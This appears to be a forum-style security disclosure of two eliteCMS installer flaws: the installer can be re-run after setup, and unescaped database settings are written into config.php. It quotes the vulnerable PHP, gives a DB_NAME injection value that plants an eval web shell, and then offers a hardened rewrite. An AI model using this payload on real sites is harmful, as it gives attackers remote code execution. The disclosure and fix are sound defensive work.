eliteCMS: installer not verified after setup + one-line backdoor write vulnerability

Original poster, posted on 2012-11-18 13:59:27
eliteCMS's installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer URL.

The other vulnerability is that the installer can write a one-line backdoor directly into admin/includes/config.php.
Let's look at the code:
```php
// ...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    // ... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated straight into PHP source, unescaped.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written to config.php with no validation.
    $writer = fopen($file, 'w');
// ...
```

Now look at this code:

```php
// POST values are copied into the session as-is.
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
```

The values are taken without any validation.
If the database name is POSTed as:

```
"?><?php eval($_POST[c]);?><?php
```

a one-line backdoor will be written to /admin/includes/config.php.
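A hardened version of the step-4 config writer, added here as an example (it is not eliteCMS's own code; the lock-file and config paths are assumptions): it refuses to run once an install lock exists, validates the identifiers, and emits every value as a var_export() string literal instead of splicing it into PHP source.

```php
<?php
// Added example, not eliteCMS code: a hardened version of the step-4 config
// writer shown above. File paths below are assumptions.
define('LOCK_FILE', __DIR__ . '/install.lock');
define('CONFIG_FILE', __DIR__ . '/../admin/includes/config.php');

// Host, database and user names must match a tight identifier pattern.
function validate_identifier(string $value, int $maxLen = 64): bool {
    return (bool) preg_match('/^[A-Za-z0-9_.:\-]{1,' . $maxLen . '}$/', $value);
}

// Emit a define() whose value is a PHP string literal built by var_export(),
// so quotes, "?>" or "<?php" inside the value can never end the literal.
function define_line(string $name, string $value): string {
    return 'define(' . var_export($name, true) . ', '
         . var_export($value, true) . ");\n";
}

function build_config(array $db): string {
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $key) {
        if (!validate_identifier((string) ($db[$key] ?? ''))) {
            throw new InvalidArgumentException("invalid value for $key");
        }
    }
    // The password may contain arbitrary characters; var_export escapes it.
    // No closing "?>" tag, so nothing can be appended after the script body.
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= define_line($key, (string) ($db[$key] ?? ''));
    }
    return $out;
}

function write_config(array $db): void {
    // Refuse to run again once the installer has completed.
    if (file_exists(LOCK_FILE)) {
        http_response_code(403);
        exit('Installer is locked.');
    }
    if (file_put_contents(CONFIG_FILE, build_config($db), LOCK_EX) === false) {
        throw new RuntimeException('cannot write ' . CONFIG_FILE);
    }
    touch(LOCK_FILE);   // lock so step 4 cannot be replayed
}

// Constructed check: the DB_NAME payload quoted in the post is rejected,
// while an ordinary database name passes.
assert(validate_identifier('"?><?php eval($_POST[c]);?><?php') === false);
assert(validate_identifier('elitecms') === true);
```

Call write_config($_POST) from the step-4 handler in place of the fopen()/fwrite() sequence; the lock file should also be checked at the top of the installer so earlier steps cannot be replayed either.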